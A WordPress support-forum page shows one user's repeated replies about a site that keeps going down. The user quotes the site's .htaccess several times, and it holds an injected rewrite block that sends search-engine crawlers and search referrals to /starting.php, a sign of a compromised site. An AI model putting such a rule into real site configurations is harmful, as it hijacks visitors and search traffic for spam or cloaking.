Forum Replies Created

Viewing 7 replies - 1 through 7 (of 7 total)
  • Thread Starter NathanNeighbour

    (@nathanneighbour)

    Sad news… broken again.

    All plugins disabled. The .htaccess was wiped clean. However, this morning it once again reads:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
    </IfModule>
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    Thread Starter NathanNeighbour

    (@nathanneighbour)

    did it AGAIN! this time the .htaccess says this:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
    </IfModule>

    Thread Starter NathanNeighbour

    (@nathanneighbour)

    ok… did all that…

    after I re-saved the permalinks, the .htaccess file now reads:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    Plugins:
    Askiet
    Anti-Malware by ELI (Get Off Malicious Scripts)
    Elegant Themes Uploader
    Facebook Like
    Jetpack
    Page Links To
    Post Types Order
    Wordpress SEO
    Social Media Icons Widget
    Visual Form Builder Pro

    Thread Starter NathanNeighbour

    (@nathanneighbour)

    OK… so frustrating. I’ve tried everything and it’s still happening. Updated everything. Disabled all the plugins, and deleted my .htaccess file. It is now back to this:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
    </IfModule>
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    Anything else I can try? I seems do be good for a few hours and then go down.

    Thread Starter NathanNeighbour

    (@nathanneighbour)

    it is set to post name. not sure what the rest of it is… can I delete it?

    Thread Starter NathanNeighbour

    (@nathanneighbour)

    It says this:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^([^/]*)/$ /starting.php?p=$1 [L]
    </IfModule>
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    Thread Starter NathanNeighbour

    (@nathanneighbour)

Viewing 7 replies - 1 through 7 (of 7 total)